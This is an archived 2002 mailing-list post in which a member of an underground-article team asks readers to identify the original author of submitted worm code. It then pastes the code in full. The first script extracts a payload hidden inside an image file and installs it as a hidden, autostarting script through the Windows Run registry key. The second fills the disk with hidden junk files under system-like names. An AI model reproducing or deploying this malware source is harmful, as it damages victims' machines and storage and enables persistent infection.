Hi!
Do you recognize this source code? Can you tell which is the real/original
author?
I explain: I am a member of the Raregazz Team, we produce (!) series of
underground-related articles. On the 18th edition, a non-member send us an
article which was half-stolen from another author (not well known either
of them). Now, he is sending us another article, a source-code explanation
for a worm. This source code makes me remember of someone else's...
So, I would like to find:
a) the original author or at least
b) know if this source is not an original (i.e is stolen)
Thank you!
var ob, ws, ws2, g, g2, t, yu, ly, f, f2;
ob = new ActiveXObject("Scripting.FileSystemObject");
ws = WScript.CreateObject ("WScript.Shell");
n = ob.GetSpecialFolder(1)+"\\";
yu = ran();
ly = n+yu+".js";
mai();
function mai(){
ws2 = ws.RegRead("HKCU\\Control Panel\\Desktop\\MenuShowDelay");
if (ws2 != "auto"){
ws.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"+yu, l
y, "REG_SZ");
ws.RegWrite("HKCU\\Control Panel\\Desktop\\MenuShowDelay", "auto", "REG_SZ");
g = ob.GetFile("girl.jpg");
f = g.OpenAsTextStream(1, -2);
g2 = f.ReadAll();
g2 = g2.substring(31029, 32457);
t = ob.OpenTextFile(ly, 2, true);
t.Write(g2);
t.Close();
f2 = ob.GetFile(ly);
f2.attributes = f2.attributes + 4;
}
}
function ran(){
rr = new Array(15);
rr[0] ="$mstask"; rr[1] ="$command"; rr[2] ="$explorer"; rr[3] ="$alg"; rr[4]
="$logon"; rr[5] ="$ie"; rr[6] ="$icq"; rr[7] ="$win"; rr[8] ="$system"; rr[9]
="$sys"; rr[10] ="$scanreg"; rr[11] ="$yahoo"; rr[12] ="$msn"; rr[13] ="$clock
"; rr[14] ="$logger"; rr[15] ="$yl";
var irr = rr[parseInt(Math.round(Math.random()*15))];
return (irr);
}
/* second source code */
var ob, f, f2, t, t2, n, w, ry0, ry1;
ob = new ActiveXObject("Scripting.FileSystemObject");
t = new Date();
t2 = t.getHours()+t.getMinutes()+t.getSeconds();
n = ob.GetSpecialFolder(1)+"\\";
wrote();
function wrote(){
ry0 = ran();
ry1 = ran2();
w = n+ry0+t2+ry1;
f = ob.OpenTextFile(w, 2, true);
for (q = 0; q < 1000; q++){rew();}
f.Close();
f2 = ob.GetFile(w);
f2.attributes = f2.attributes + 4;
}
function ran(){
rr = new Array(15);
rr[0] ="mstask."; rr[1] ="command."; rr[2] ="explorer."; rr[3] ="alg."; rr[4] =
"logon."; rr[5] ="ie."; rr[6] ="leeme."; rr[7] ="win."; rr[8] ="system."; rr[9]
="sys."; rr[10] ="scanreg."; rr[11] ="icq."; rr[12] ="msn."; rr[13] ="clock.";
rr[14] ="logger."; rr[15] ="yl.";
var irr = rr[parseInt(Math.round(Math.random()*15))];
return (irr);
}
function ran2(){
rr2 = new Array(15);
rr2[0] =".exe"; rr2[1] =".doc"; rr2[2] =".com"; rr2[3] =".bat"; rr2[4] =".tmp";
rr2[5] =".xls"; rr2[6] =".ini"; rr2[7] =".inf"; rr2[8] =".vxd"; rr2[9] =".dll"
; rr2[10] =".htm"; rr2[11] =".cpl"; rr2[12] =".sys"; rr2[13] =".dat"; rr2[14] =
".yl"; rr2[15] =".hex";
var irr2 = rr2[parseInt(Math.round(Math.random()*15))];
return (irr2);
}
function rew(){
f.Write(":::: GusanoDisk Y v5.recover ::::");
f.Write("Creado :: "+ t2);
f.WriteBlankLines(90);
for (q = 0; q < 900; q++){f.Write("GusanoDisk Y by HeX. Gracias por sus
megabytes.");
}
}
This archive was generated by hypermail 2b30 : Sun Mar 17 2002 - 21:24:18 PST